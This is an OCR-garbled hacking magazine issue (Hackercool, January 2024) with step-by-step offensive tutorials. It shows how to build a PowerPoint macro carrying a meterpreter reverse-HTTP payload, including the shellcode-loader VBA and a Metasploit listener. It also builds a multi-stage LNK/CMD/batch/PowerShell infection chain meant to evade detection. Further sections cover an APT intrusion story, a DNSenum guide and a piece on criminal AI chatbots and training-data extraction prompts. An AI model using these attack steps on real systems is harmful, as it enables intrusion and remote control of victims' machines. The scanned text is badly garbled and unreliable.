Simplifying Cyber Security since 2016 eG January 2024 Edition 7 Issue1_ _—_ Learn how Black Hat Hackers hack Creating malicious PowerPoint ppt used by hacker group TA402 in INITIAL ACCESS INFECTION CHAIN What is an infection chain? with an example. BYPASSING AV / EDR How are hackers using Github to evade detection of their malicious activity HACKSTORY The story of how Chinese hacker group UNC4841 exploited a zero-day in Barracuda Email security Gateway to perform espionage for 8 months.4 é 2 - Ee eV BE Bo a ‘es $4. WT /month join us on shells.com To Advertise with us Contact : ladmin@hackercoolmagazine.conlCopyright © 2016 - 2024 Hackercool CyberSecurity (OPC) Pvt Ltd |All rights reserved. No part of this publication may be reproduced, distributed, or ee in any form or by any means, including photocopying, recording, or other| lectronic or mechanical methods, without the prior written permission of the lpublishe -r, except in the case of brief quotations embodied in critical reviews and certain other noncommercial uses permitted by copyright law. For permission requests, write to the publisher, addressed “Attention: Permissions Coordinator,” at |the address below. [Any references to historical events, real people, or real places are used fictitiously. Na mes, characters, and places are products of the author's imagination. Hackercool Cybersecurity (OPC) Pvt Ltd. Banjara Hills, Hyderabad 50003. Telangana, India. Website : www.hackercoolmagazine.com] Email Address : (min @hackercoolmagazinInformation provided in this Magazine is strictly for educational purpose only. Please don't misuse this knowledge to hack into devices or networks without taking permission. The Magazine will not take any responsibility for misuse of this information.5 Then you will know the truth and the truth will set you free John 8:32 Editor's Note Edition 7 Issue 1 Hi all. Welcome to the first Issue of Hackercool Magazine for year 2024. After completing six editions, I ought it would be a good idea to reboot the content of the Magazine. Although, I have been thi- king about this since few months now, I never had a clear picture. Recently, the picture became somewhat clearer and I decide the first Issue of Edition 7 would be a great place to start. As you read this Issue, you will see that it has two new features included and two old features ought back. The first new feature you will read is “Initial Access”. Initial Access, as its name im- lies features the file formats and types of vulnerabilities being used by Black Hat Hackers in real vorld to gain initial access to target system or target network. ‘The second new feature introduced with this edition is “Infection chain”. Also called as attack chain or execution chain, infection chain features all the files, scripts and commands that are exec-| uted after target user clicks on the file sent for gaining initial access to the execution of actual payl oad on the target system. I brought back an old feature “Tool of the month” with this Edition. [For start, you will see a complete guide of DNSenum in this Issue. Another feature I brought back is Hackstory. If you subscribed to Hackercool Magazine in its tarting days, you will be familiar with this feature. No problem though, In the present Issue, enjoy| eading the story in which we tell you how a Chinese APT performed cyber espionage for 8 months on organizations by exploiting a vulnerability in Barracuda ESG devices. In Bypassing JAV/EDR, we explain our readers practically, how Black Hat Hackers are using Github to hide the ir malicious activity. This is a enjoyable read+practical, as you will see. [ hope you will enjoy it a fmuch as we enjoyed preparing it. Kalyan Chinta, Founder, Hackercool Magazine “IT'S POSSIBLE TO SEND MALICIOUS PULL REQUESTS WITH ATTACKER-CONTROLLED DATA FROM THE HUGGING FACE SERVICE TO ANY REPOSITORY ON THE PLATFORM, AS| WELL AS HIJACK ANY MODELS THAT ARE SUBMITTED THROUGH THE CONVERSION SERVICE," -HIDDENLAYERINSIDE See what our Hackercool Magazine's January 2024 Issue has in store for you. 1. Initial Access: Creating malicious PowerPoint file used by hacker group TA402. 2. Hack story: The story of how Brracuda ESG appliance got hacked by a Chinese hacker group, 3. Infection Chain: Whay is an infection ch: Why hackers use it? with an example. 4. Tool Of The Month: DNSenum. or . Online security: Cybercriminals are eréating their own AL chatbots to support hacking and scam users. 6. Bypassing Anti virus / EDR: How hackers are using Github to hide their malicious activity. Other Useful ResourcesINITIAL ACCESS 1024 and we have decided to reboot your Hackercool Magazine. As a part of this reboot, ture was given birth to, It is named “Initial Access”. In this feature we bring readers the knowledge about the files or vectors used By Black Hat hackers to gain initial access to a target machine or the target network [Macros have been one of Black Hat Hacker's favorite vector to gain initial acc before Microsoft anned macros by default in 2022. But there are still cases of macros being used by APT’s and Threat Actors around the world. Of course, with a bit of social engineering. For the first article in feature “Initial Access”, we want to teach how to create PowerPoint [Macros to our readers. PowerPoint macros were detected being used for initial access by hacker lgroup TA402. So, without delay, let’s recreate a PowerPoint macro. ‘As already told, macros were used by hackers around the world to gain initial access. In our previous Issues, readers lea ite word macros and Excel Macros. To a large extent, o- lnly these two types of macros were used to g: access or install malware by Black Hat ha round the word. But some hacker group above mentioned TAd02) used Power Po int macros too. So, we decided to include PowerPoint macros for our readers. Macros are Visual Basic Application (VBA) code, To ‘create a Power Point’ Macro, we need to e macro VBA code. As I always say, there are many ways a macro can be created but I nom to create it. o~ ‘emeedaeiaaiaatinel eet) vbal windows/x64/meterpreter/reverse http lhost=192.168. CPO e meme lL aT) [-] No platform was selected, choosing Ms Mae eee ALL} [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 765 bytes Lona S 4 LD a) EJ een Pa) Joke ee eae ee CMe Ce CaO PIERSON Ae CMR a LM tes psa Cd LongPtr, Kwce As Long, ByVal Tblx As Long, Dsgmcsskg As Long) As L aaa Private Declare PtrSafe Function VirtualAlloc Lib "kernel32 (ByVal Blayalrqn As Long, ByVal Meag As Long, ByVal Atpccph As Lo ng, ByVal Xbjbis As Long) As LongPtr Private Declare PtrSafe Function RtlMoveMemory Lib "kernel3yi Pam Le Nee CPM To Lec Pe PLR CLD For Dffwilvrj = LBound(Xzhlnpcdw) To UBound(Xzhlnpcdw) Ti ae ct te ee ak ToD) eee Saar ee a aes ae Lee Next Dffwilvrj Uhao (og ea 500408 eS Lito Med) rea ae) Co0 0) Micon) eT) ST) Sola elt ae Auto Open Sao) The macro code to'get a meterpreter reverse shell is ready. Now, let’s create a PowerPoint present ation to add this macro code. For this, I will be using the latest version of Office Suite. I open a presentation as shown below Click to add title Click to add subtitle9 make some personal changes to the PowerPoint presentation. You can call it self-promotion. ef Cee iy tahanchokrverth @ om - (=) D> [leat aooy fae] Ss BI S aw N~ % side “B~ | Be Be na KK Cipboard 5 Sider Fort sl | Test for powe®point macros > HackerS%ol Lab ° ° ° oO oO oO sides C8 eg and site os Bone EN 2 4 + [Time to add the macro. Go to View>macros | [m) | [3] Ssiseraaer | Omer | Q []Handout Master () Grdtnes ese || aay |e Cy Notes Master DiGuices Window Grayscale = > Master Views stow 00m =o10 A new window will open as shown below. Side of _ englsh cnted sates |Give it a name and click on “create”. t) Macro ins Description ye ta name and ick om “creates ae | quan co eS ‘View [J Reading View — [=] Macro11 [nis will open another new window of Microsoft Visual Basic applications. TST —= a oasis eles kiwe¥ 910m [Delete whatever code is present in this window. Copy the code of the macro we just created on. lour attacker system and paste it here. [eos Se-u sans tvs us¥~ eo nace [Hit CTRL#S to save the macro. Then save the Power presentation as a Power Point Macro-enable {d presentation (PPTM). “The potential benefits of artificial intelligence are huge, so are the dangers.” - Dave Waters.12 Test for powerpoint macrospptm PowerPoint Macro-Enabled Presentation (*pptm) A Hide Folders Tools + (On the attacker machine, start a metasploit listener as shown below: msf6 > use exploit/multihandler meee ea eee Pa mL ee eae ee Le msf6 > Interrupt: use the ‘exit' command to quit isi Me ee eRe A eel Using configured payload generic/shell_reverse tcp msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/re verse http payload => windows/x64/meterpreter/reverse http msf6 exploit(multi/handler) > set Lhost 192.168.40.153 lhost => 192.168.490.153 msf6 exploit(multi/handler) > set lport 446 lport => 446 msf6 exploit(multi/handler) > run Se Tae ee ae SL EL Lo) [On the target system, open the PowerPoint presentation Test for powerpoint macrosPeeler es mea eee cd erm eed ea heed Re he ea Pl eC) [!] http://192.168.40.153:446 handling request from 192.168.40.1; (U ORME 1G ee me mai Whe ce Le AOL Og Loo Pe RERA nl ante al http://192.168.40.153:446 handling request from 192.168.40.1; (U UID: salqehrx) Staging x64 payload (201820 bytes) 5 [!] http://192.168.40.153:446 handling request from 192.168.40.1; (U OMI ese eee Cea eae rae ml Meds la ee ng will not work! Meterpreter session 1 opened (192.168.40.153:446 -> 192.168.40.1 156342) at 2024-02-17 00:32:51 -0500 Cece eS) ce Fe UY ear Lea 1) : Windows 10 (10.0 Build 19045). leaped ig ery NES eee tT: (Mes MS DTT Baa) Pa eco teU Reece m Mtr! eee eis PL Art meterpreter > getuid ata a eV Use meterpreter > ff The story of Barracuda ESG appliances gettng hacked. ‘out different ck here we go What is Barracuda Email Security _ Usually, these are placed to receive the Gateway (ESG)? first in line. Barracuda -e used by many com 5 not -t character is UNC4841. Usually, t and APT are named by owned Mandiant. UNC4841 is a nar ctor belonging to People’s Republic of Chii (Cont'd on next page) When you are writing story on hacking i ry that all the actors involved should b it can be software14 (PRC). Backdoor What is CVE-2023-2868? What is a Black Hat Hacking attack without CVE2 868 in a remote code execution installing a backdoor on the compromised devic} vulnerability in Barracada Email Security Gatew e. UNC48#1 used wget to download these backd ay (ESG) appliance form factor only with versio -oors to the compromised ESG appliance. The 5.13.0.01-9.2.0.006. You can lean more about backdoors they used were SEASPY, SEASIDE ‘ommand injection in our blogpost. SALTWATER and SANDBAR. On some devic ‘This command injection vulnerability can be -es , these backdoors were downloaded directly executed remotely and is present in the parsing and on some devices these was downloaded as logic of the processing of TAR files that are rece an archive and extracted on the compromised ived as attachments. The input of file name atta- appliance. ched to the received email is not sanitized giving SEASPY is the primary backdoor deployed kise to the vulnerability and this file name contai- by UNC4841 that was installed as a PCAP filter ed is executed as a system command. Since yo: on ports TCP/25 and TCP/587. The code of the are now aware of the characters involved in th- SEASPY backdoor appears similar to that of a story, it’s time to start the actual tory. publicly available backdoor. SEASPY was install "It took over six months for 24 with the file name Barracuda Mail Service”. Barracuda to detect the Another backdoor used| jometime in the month of ne by the UNC4841 hacker ctober 2023, some of the EXploitation and release a group was SALTWATER. ganizations using Barracuda Email -, 1 SALTWATER had functionality to Security Gateway appliances receivedP ECR fOr it. ", acymtoad, upload, execute comman- mail, Some of these emails was sent from spoof ds, proxying and tunneling, Apart from this, it ed email addresses, some from domains that acts as a module for Barracuda SMTP daemon, ere not even in use. some mainly from new IP UNC4841 continuously time stamped this \ddresses that were not used in hacking activity backdoor to avoid detection. intil now and some from organizations with alre The third backdoor payload SEASIDE is a lua| kdy compromised Barracuda ESG devices. based module for Barracuda SMTP daemon tha ‘Although they came from different sources, -t was used to make SMTP HELO/EHLO comm mne thing was common in the received emails." -ands, received an encoded IP address and pass- |All of these emails contained tar archives as _es argumens to external binary WHIRLPOOL kattachments, Some of the tar archives attached w (to gain a reverse shell). lere given extensions of jpg and .dat. While four Apart from these backdoors, UNC4841 also| f them were harmless tar archives with nothing downloaded and installed a rootkit (that was na- wut dummy text, the first attachment was design- med SANDBAR). It is in the form of trojanized led to exploit CVE-2023-2868 vulnerability network file system kernel module for Linux. It Since the CVE-2023-2868 vulnerability is the is designed to hide specific processes. The code result of a vulnerability in the passing of the file of the SANDDAR rootkit were found to be jame the content of the tar archives and the files adapted from another publicly available rootkit karely mattered. The exploit payload was in the on Github. Attackers configured SANDBAR to lname of the tar archive. hide processes starting with name “BAR”, It is Obviously, the exploit payload was an obfusca very likely they designed it to hide the SEASPY ted command to gain a new shell on the Barra backdoor that is installed as “Barracuda Email cuda appliances with the rights of the appliance Service”. hiself. This shell was itself a simple shell. (Cont'd on next page) Initial Access15 Not just installing external backdoors, UNC4841 also made changes to some of the inb uilt modules of Barracuda ESG to trojanize the- m. They altogether trojanized three Lua module 5. One of the LUA modules was modified to regi- ter an event handler for incoming email attach- nents if it has a name that contains a special val- e. This has been named SEASPRAY. SEASPRAY, once it detects the file name it fants, copies that file to the mp directory and Jexecutes WHIRLPOOL to establish a reverse shell. Another module of the Barracuda ESG th- fat processes emails was trojanized to work as a lbackdoor named SKIPJACK. It registers a listen- Ki for incoming email’s headers and subjects, lecodes and extracts. Persistence & Exfiltration stay persistent on the arget ESG applian compromised. These incl de hourly and daily cron jjobs, adding a persistent script 0 /etc/init.djrc, adding one to ing the SANDBAR kernel rootkit in a way suc! Ithat it will be executed on startup. With UNC4841 taking so many measures to it public with the vulnerability, lupdate version perl script and deplo-mgye laterally. to exfiltrate files. POST remediation It took over six months for Barracuda to detect the exploitation and release a patch for it. Subse- quently, they employed the services of Mandiant| to investigate the whole hacking incident. As alr- eady mentioned above, it was Mandiant that na- med this hacker group as UNC4841. They concl uded that it was a Chinese threat actor after their] hacking activity decreased during the period tha, t coincided with the beginning of the Chinese New Year. The Chinese New Year is observed as a holiday is People’s Republic of China. After remediation by Barracuda, no new ESG device was compromised, but it seems the APT UNC484 anticipated the remediation. That ’s because UNC4841 used different variations of SKIPJACK to continuously have access to the |UNC4841 took many steps""4.5 sogn as Barracuda went “8¢t appliance but only’ on select targets. On some other select targets, Mandiant observ they observed attempts being ed UNC4841 deploying made by UNC4841 to another passive backdoor they named DEPTHCHARGE. "" Being installed through a complex execution chain which involves using configuration files, DEPTHCHARGE is package -d as a Linux shared object library that is preloa naintain persistent access to the ESG appliance, ded into Barracuda SMTP (DSMTP) daemon. it would be naive to think that they will not use Here, it listens passively to receive encrypted jit for exfiltrating any data from the target device. commands sent by the hackers, decrypts them In most of the devices compromised by UNC48_ using OpenSSL and executes them before sendi- 41, the files to be extracted were saved in the _ ng the results to the Command & Control form of tar.gz archives in the /mail/mp directory (C&C) server by masquerading them as SMTP be uploaded to the attacker controller server. commands. penSSL was used to exfiltrate these tar.gz file Another malware family UNC4841 deployed on cchives. In some other compromised appliance- select targets is FOXTROT/FOXGLOVE. FOX , they employed a shell script to search for spec GLOVE is a launcher that executes FOXTROT. jific emails on “mstore”. mstore is a place where which is a C++ backdoor. Jemails received by Barracuda ESG appliances ar. FOXTROT can capture keystrokes, execute te stored temporarily. These shell scripts were us shell commands, start a reverse shell and transfe ed to search for emails belonging to specific use -r files. In their entire hacking operation, these rs or email domains and stored them in the two are the only malware that are not specificall- jail/lua directory to be exfiltrated. In a few cas- y built for Barracuda ESG appliances. s, they even employed anon file sharing service (Cont'd on next page)16 Lateral Movement As soon as Barracuda went public with the rulnerability, they observed attempts being mad e by UNC4841 to move laterally. The first evide nce was observed on May10, 2023 when open source tools like fscan were used to perform internal reconnaissance. At the same time, UNC4841 tried to move later- lrally on the network from impacted ESG applia- lnces using credentials. These credentials were lharvested from contents of messages stolen from e mstore. Mandiant came to this conclusion af- iter finding many cleartext credentials in messag- Their purpose was clearly spying on the Inbox. In another case, UNC4841 gained access to Win -dows server update service (WSUS) using a do- m ain administrator account found in mstore. They also tried to create SSH accounts on co- mpromised ESG devices which were once again, used to maintain access. They also tried to move laterally via SSH to VPNs, proxy servers and other edge appliances on victim’s network. Targeting Majority of the targets of UN4841 appear to be government organizations. Another proof that t s stored on mstore. his was a highlevel cybersecurity operation. In some cases, Mandiant observed that Itis absolute irony that the appliances JUNC4841 successfully gained access to an accou that was designed to protect emails became a so nt through outlook web access (OWA). Surprisi- urce for spying on emails. But in Black Hat hack Ingly no evidence was found to say that UNC484 -ing anything is possible. 1 used this account to send any emails they want INFECTION CHAIN “Infection Chain” is another new feature added to the Hackercool Magazine as part of the |REBOOT. You have seen a few infection chains (also known as attack chain) already in our previ- jou s Issues, especially in the Issue with a feature on ROKRAT. But that article on different infecti- jon chains was so big or that no matter how hard we tried to focus on the minute details, it was goi ng to leave some edges uncovered. In the first article of this feature we want our readers to specif ically understand what an infection chain is. So, let’s start. What is an infection chain? In almost all the hacking tutorials on internet you see, they create a payload which is most probably an executable, copy it to the target system and click on it to get a session on the attacker system. In Black Hat Hacking though, it’s not that simple although there are rare cases of that too. ISo, Black Hat Hackers use an infection chain which is sometimes very complex and, in many cases, very unique. I am getting a feeling I am going around the bush, so here's the definition. Infection chain is set of tools and scripts which are executed in stages, each downloading and lexecuting the next script or tool until the payload is downloaded and installed on the target syste- mm. Did I put it in simple terms for you to understand? If the answer is NO, then I think like every- lthing in Hackercool Magazine, it has to be explained in practical. So, let’s begin. We are doing this on a Windows 10 system which already has a meterpreter binary copied ‘0 it from the attacker system. on it. Our attacker system, as you might have figured out by now is IKali Linux with a listener running on it as shown below. “Humans should be worried about the threat posed by artificial intelligence.” -Bill Gates.17 Poco see Ce ue SEs eee. eee a RSC asOr ta Cee oe Com nese cul feemsUr mene ie ar Mu tek 27 Rene eC te) esto Soa ) > set payload windows/x64/meterpreter/r Nine payload indows/x64/meterpreter/reverse_tcp fist Moe eS oa| ) > set Lhost 192.168.460.153 Uhost => 192.168.490.153 ii moe sea ean eee CLrs gee cr isi CP mal ema [heme set Lhost 192.168.40.153 stileeaa 192.168.406.153 ieaceot Crates Ce mee aa eee) eee ere) msf6 exploit(multi/handler) > run a meterpreter Started reverse TCP handler on 192.168.40.153:4444 Sending stage (200774 bytes) to 192.168.40.150 Meterpreter session 1 opened (192.168.40.153:4444 -> 192.168.40 50:50477) at 2024-02-19 05:07:06 -0500 Pieaela Ya ae od meterpreter > §f19 ‘ow, you successfully created your first infection chain although at present itis looking more like lun itty-bitty link than any infection chain, Now let’s add another element into the middle of the ILNK file and payload. Hmm, what should I add here? How about a PowerShell script? =a eal ‘meterpreter payload.exe Powershell script named it “malicious_a.psI” and it contains the following script. If you are new to PowerShell, thi s script executes a Windows executable from the current working directory. J malicious_a.ps1 - Notepad - a * File Edit Format View Help Start-Process met_x64_153_4444 exe Local > Temp v © | Search Temp Pp =m A Name Date modified EY malicious_a.ps1 2/20/2024 5:50 P} fF) met_x64_153_4444.exe 9/6/2022 2:01 PM jow, I change the script in the “malicious Ink” target field to execute this PowerShell script instea- ld of directly executing the payload. Here’s the code. cmd.exe /c "powershell.exe %temp% \malicious_a.ps1” Targettype: Application Targetlocation: System32 n32\emd.exe /c "powershell.exe Ytemp%\malicious_| Target20 $M Malicious Lnk Properties x Colors Securty Deas Previous Versions General Shotest Options Font avout Malcious_Lnk Targettype: Application Targetlocation” Systema2 Target Stanin Program Files Mozila Firefox Shoreuthey. [Nene OpenFile Locaton | Change eon Advanced. 0K Cancel Once again, when you click on the “malicious.Ink” file, you should get a meterpreter session as khown below ees Tay.) MerimTCe a ey Started reverse TCP handler on 192.168. 41 CoM ace) 10774 by ) to 192.168.40.150 Meterpreter session 16 opened (192.168.40.153:4444 -> 192.168.4 bol TO) Eh arAc oeek CL) To further lengthen the infection chain, I will add a Batch script now to this. =(2 ey BAT Batch fle en moterpreter payload.oxe21 |Here’s the Batch script. DF malicious_b.bat - Notepad = o x File Edit Format View Help powershell.exe -ExecutionPolicy Bypass -File malicious_a.ps1 pause |(Except the “pause” command as I have added it while checking the infection chain and forgot to remove it). As you might have understood by now, when we click on the “malicious.Ink” shortcut, [Batch file will be executed which in turn execute the PowerShell script and that in turn executes {the final payloads. So, I change the target field of “maliciousilnk” accordingly. cmd.exe /c start %temp%\malicious_b.bat Previous Versions Secutty Details General Shortcut Options Font Layout HR tcious ine Targettype: Application Taigetlocation: System32 Target |\System32\emd exe /e start %ctemp%\malicious_b. bal] ‘Startin [*CAProgram Files\Mozila Firefox” ] Shorteutkey: [None ] Run Normal window y comet [sid Open File Location Change icon hope you are getting this. Its not that difficult but a bit delicate and confusing, That’s it. Get the fine details once and you should be good. Now, the final piece of the puzzle, I will be adding22 [CMD file to the infection chain as shown below. -§-2-o-0 notasked sgh rater pond one [Here’s the CMD file. @ malicious_ccmd - Notepad - o x File Edit Format View Help start %temp%\malicious_b.bat lHere’s all files at one place « Local > Temp v © © Search Temp Pp A ai Name Date modified 5 E& malicious_a.ps1 2/20/2024 7:00 P| ’ »| malicious_b.bat 2/20/2024 6:45 P| *»| malicious_c.cmd 2/20/2024 7:16 PI x ll Malicious_Lnk 2/20/2024 6:17 P| cf ‘| met_x64_153_4444.exe 9/6/2022 2:01 PN x [ata ‘Artificial intelligence is just a new tool, one that can be edo good and for bad urposes and one that comes with new dangers and downsides as well. We know already that although machine learning has huge ae data sets with ingrained biases will produce biased results — gar) -Sarah Jeong age in, garbage out.”23 1 Malicious inc Properties x Colm Scary Sl sm oe _ sk a Target —_[ytonendene sat emp aicoue_emd satin \ProramFies Meola Feo Pan Nomalwndow Comment OpenFie eaten || Changeicon.__Advarend. m ancl ool Once again, whenever the shortcut file is clicked, we will have a meterpreter session on the attac ker system. Peer tse ) > run Started reverse TCP handler on 192.168.40.153:4444 Sending stage (200774 bytes) to 192.168.40.150 Meterpreter s ion 23 opened (192.168.40.15. 444 -> 192.168.4 0.150:50567) at 2024-02-20 08:48:13 -0500 meterpreter > That’s it. You have successfully created an infection chain just like a Black Hat hacker. But there’s lone big question still unanswered. Why hackers use an infection chain? In the infection chain we created above, have you noticed something? From the first step of {clicking on the LNK file to that step before the payload is executed we are not performing any ma| licious actions on the system at all. Just execution of some commands and scripts which are consi- ldered LEGITIMATE. This multi stage infection will improve the chances of a hacker to infect yo: ur system more than sending the payload itself.24 TOOL OF THE MONTH DNSenum is a multithreaded perl script that is used to gather information from target DNS serve 1s, The features of DNSenum are, 1.Get the host's address (A record). 2.Get the nameservers (N' b.Get the MX record (MX). }1.Perform axfr queries on nameservers and get BIND VERSION. 5.Get extra names and subdomains via google scraping (google query = "www site:domain' }s.Brute force subdomains from file, can also perform recursion on subdomain that have NS recor- lds. 17.Calculate C class domain network ranges and perform whois queries on them. Perform reverse lookups on netranges (C class or/and whois netranges) Let’s see how to perform DNS enumeration with DNSenum. DNSenum is included by default in IKali Linux. If you want to enumerate a domain with DNSenum. all you have to do is supply a do- main name as shown below. When run in default mode, DNSnum first enumerates the host address, then the name servers, t lhen MX records, ACER queries, extra names and subdomains via google scraping, brute forces s- lubdomains from them, calculates the class C IP network ranges from the results and performs wh- lois queries on them and performs reverse lookup on these IP addresses. POLS tere 07 Die id ey Ere) dnsenum VERSION:1.2.6 Era) Ee 93.106.140 “Uf you're not concerned about AI safety you should be. Vasly more risk than North Korea.” -Elon Musk.dns1.name-services.com. 98.148.137 dns4.name-services.com. or eed dns3.name-services.com. Pe CL re et) dns2.name-services.com. eel B dns5.name-services.com. 98.148.139 STU CRU ee eee aoe] AXFR record query failed: REFUSED Seu eR ee eee aoe AXFR record query failed: REFUSED Seu eR ee eee AXFR record query failed: REFUSED DTU RUS ee eee ee Las ‘Deepfakes and misinformation are just two of the ways AI could have major negative impact on fake news.” -Dave WatersCEPA er oe cre Ul reel) peo @.225.138 Ce Ce ee e.com. roe 3.106.140 Oe ae eee CEC ole Ins-server In some cases, the result from the enumeration can vary depending on the server that is queried. lUsing DNSenum, we can perform a query by using another DNS server as shown below ‘The consequences of Al going wrong are severe so we have to be proactive rather than reactive. Elon MuskETol eee} dns4.name-services.com dnsenum VERSION:1.2.6 Unknown option: dns-server When you pire use ae senum on a domain to cee orm enumeration, you will notice oe there wi ay because the file used by DNSenum [‘fusrshare/dnsenum/dnstet”) has over 1506 entries, S unl the tol checks al the ents, here will definitely b duce this data? Yes, by usi mother file instea t one. For example, we can create our own “dns.txt” file with entries of subdomains ln other type of enumeration, le (-f) We can specify this custom file with the () option as shown below Ere eee) dns. txt dnsenum VERSION:1.2.6 --subfile We can also save the output of subdomain brute forcing in a file using the subfile option as shown below Ere eee) dns.txt subdomains. txtl ULL Ce had28 --noreverse Coming to reverse lookup, while performing reverse lookup on 512 IP addresses (in this case) de -finitely takes time. But don’t worry. We can skip the reverse lookup by using the normal option: Clo eel dns.txt dnsenum VERSION:1.2.6 --private This option enumerates and saves the private IP addresses of a domain in the file named| kdomain_name>_ips.txt Flo eel) dns.txt dnsenum VERSION:1.2.6 acme.com_ips.txt bene adie Pee PS --timeout (-t) The default timeout option of tcp queries and udp queries for dnsenum is 10 seconds. The timeo} ut option allows us to change it. acme. com Clea dnsenum VERSIO! 2.6 --threads (-va) his option is used to specify the number of threads to perform different queries.—( Mes $ dnsenum acme.com -f dns.txt thre dnsenum VERSION:1.2.6 --verbose (-v) You already know what this option does. It reveals more information. See the differences. m acme.com -f dns.txt Pate VERSION:1.2.6 Flo ere 93.106.140 --scrape (-s) fy the number of subdomains to be scraped from Google. CRE Le eet) dnsenum VERSION:1.2.6Pere Ce Pye ose Eee Pere ee Pere te CeCe ae oe Ere 93.106. 140 --page (-p) While scraping the subdomain with dnsenum above, you should have noticed that it queries 3oogle search pages for subdomains related to the domain. By default, it is 20 pages. Using this loption, it can be changed. For example, lets set it to 10. eee eee dnsenum VERSION: 1.2.6 ‘here's no silver bullet with cybersecurity; a layered defense is the only viable option.” ames Scott.Rig te EIR te Cr Ig Te lm ee CRC Ig Cte CECI te CECI lem ee CCR ee CR Ig Tt --recursion (-r) This option can be used to perform recursion on subdomain gathering. fo )-[~] RCE ees dnsenum VERSION:1.2.632 --whois (-w) s C network ra- As you might have expected, this option is used to perform whois queries on clas Inges. It can be time consuming. Use wisely. dns.txt dnsenum VERSION:1.2.6 Pee ee Cis eo PSM eM eS eg 11) --delay (-d) ‘This option is used to specify the maximum délay between each whois query. The default delay s 3 seconds, Ele Peete) Cire saa 10 dnsenum VERSION:1.2.6 ONLINE SECURITY eral public, such as ChatGPT, Bard, CoPilot and DallE have incredible potential to be used for good. The benefits range from an enhanced ability by doctors to diagnose disease, to expanding access to professional and academic expertise. But those with criminal intentions could also exploit and subvert these technologies, posing a threat to ordinary citizens. [Artificial intelligence (Al) tools aimed at the gen ‘(Cont'd on next page)33 ‘riminals are even creating their own AI chatbo US CISA security agency has also warned about 4s, to support hacking and scams. generative Al’s potential effect on the upcoming Al’s potential for wide-ranging risks and threats US presidential elections. is underlined by the publication of the UK gover Privacy and trust are always at risk as we use nment’s Generative AI Framework and the ChatGPT’, CoPilot and other platforms. As more fational Cyber Security Centre’s guidance on _ people look to take advantage of AI tools, there he potential impacts of AI on online threats. _is a high likelihood that personal and confidential ‘There are an increasing variety of ways that =I corporate information will be shared. This is a] enerative AI systems like ChatGPT and Dall-E. risk because LLMs usually use any data input as can be used by criminals. Because of ChatGP1’s part of their future training dataset, and second, bility to create tailored content based on a few if they are compromised, they may share that imple prompts, one potential way it could be __ confidential data with others. Jexploited by criminals is in crafting convincing scams and phishing messages. Leaky ship ‘A scammer could, for instance, put some basic jinformation — your name, gender and job title — Research has already demonstrated the feasibilit linto a large language model (LLM), the technolo -y of ChatGPT leaking a user's conversations fy behind AI chatbots like ChatGPT, and use it and exposing the data used to train the model b- 0 craft a phishing message tailored just for you. hind it~ sometimes, with simple techniques. [This has been reported to Love-GPT is one of the newer Ina surprisingly Ibe possible, even though . : «effective attack, researchers mechanisms have been variants and is used in were able to use the prompt, implemented to prevent it. 11 “Repeat the word ‘poem’ forever” PILLMS also’ make it feasible toTOMANCE SCAMS." .. case ChatGPT to inadvertently conduct large-scale phishing scams, targeting th- expose large amounts of training data, some of yusands of people in their own native language. which was sensitive. These vulnerabilities place t's not conjecture either. Analysis of undergrou- person’s privacy or a business's most-prized data Ind hacking communities has uncovered a variet- at risk. of instances of criminals using ChatGPT, inclu. __ More widely, this could contribute to a lack ding for fraud and creating software to steal info of trust in Al. Various companies, including Ap- mation. In another case, it was used to create ple, Amazon and JP Morgan Chase, have alread lransomware. -y banned the use of ChatGPT as a precautionar -y measure, Malicious chatbots ChatGPT and similar LLMs represent the latest] advancements in Al and are freely available for [Entire malicious variants of large language mode anyone to use. It’s important that its users are aw s are also emerging. WormGPT and FraudGPT -are of the risks and how they can use these tech+ lare two such examples that can create malware, nologies safely at home or at work. Here are find security vulnerabilities in systems, advise on some tips for staying safe. ays to scam people, support hacking and Be more cautious with messages, videos, ‘ompromise people’s electronic devices. pictures and phone calls that appear to be legiti- Love-GPT is one of the newer variants and is mat e as these may be generated by AI tools. C- sed in romance scams. It has been used to crea heck with a second or known source to be sure. [te fake dating profiles capable of chatting to uns. Avoid sharing sensitive or private information uspecting victims on Tinder, Bumble, and other with ChatGPT and LLMs more generally. Also, pps. remember that Al tools are not perfect and may JAs a result of these threats, Europol has issued a provide inaccurate responses. Keep this in mind [press release about criminals’ use of LLMs. The (Cont'd on next page)34 Iparticularly when considering their use in medic- jal diagnoses, work and other areas of life. . . ‘You should also check with your employer This Article Ibefore using AI technologies in your job. There a fay be specific rules around their use, or they first appeared lmay not be allowed at all. As technology advanc 7 Jes apace, we can at least use some sensible prec- in . 1 tions to protect against the threats we know [Lhe Conversation jabout and those yet to come. How Hackers are using Github to hide their malicious activity BYPASSING AV / EDR Recently researchers at Reversing Labs observed a hacker group using Github to hide their nalicious activity. Unlike previous cases this doesn’t involve using Github for hosting Command Control (C&C) infrastructure, In fact, they were using Github this time to hide their malicious commands. How? Let’s find out. What is Github? ‘ho doesn’t know what Github is. It is used to host software repositories and is used by over 100 million developers around the world. We at Hackercool Magazine also use Github to host two rep} lositories belonging to us: Vulnera and Vulnerawa. All good but Github is not just used for hosting complete software repositories. It has another feature called Gists. What is a Github Gist? |Github Gist is an innovative feature of Github that allows users (Github users) to store and distrib- jute code snippets without the need of creating a full software repository. Using Github gists, you |can store random code, bash scripts, text, comments etc. Gists can also be used to embed this code on a website. There are two types of Gists in Github. They are Public Gist and Secret Gists. Github public |gists are visible on search engines and also on Github Discover. Secret gits are not searchable and lrre also not visible on Discover. Although they are not visible or searchable, it doesn’t mean they lire entirely private. If anybody knows the URL of the gist, they can just visit and view the code you have there. How to create a Gist? jeedless to say, you need to have a Github account to create any types of gist. Since we have an jaccount, let me demonstrate on our account. Login to Github and visit the page “l [b.com” or visit thttps;//gists.github.com)” and then login into your Github account. “Hacking just means building something quickly or testing the boundaries of what can be done.” — Mark Zuckerberg.€ lomnA) om) Cure COE Celcom oe Celio ol cura ore) \w) oO SUR Peer Rc ee ed on thi = ca lo=} a el Kali Linux 8 KaliTools # Kali Docs 3 KaliForums @ Kali NetHunter = Exploit-DB GitHub Gist Cee sk) Instantly share code, notes, and snippets. a gist with a Python coda oma) o8 Pune) Kali Linux 8 Kali Tools # Kali Docs ¥¢ Kali Forums @& Kali NetHunter ® Exploit-DB GitHubGist s Comes oc Instantly share code, notes, and snippets. | on ory IIf you are our magazine reader from recent times, you should be familiar with the code I am typin| g here. Once executed, it creates a new directory named “hackercool” in the tmp folder of the ‘arget system. Once you are finished adding code to the gist, scroll down and click on “Create Secret gist” button. € 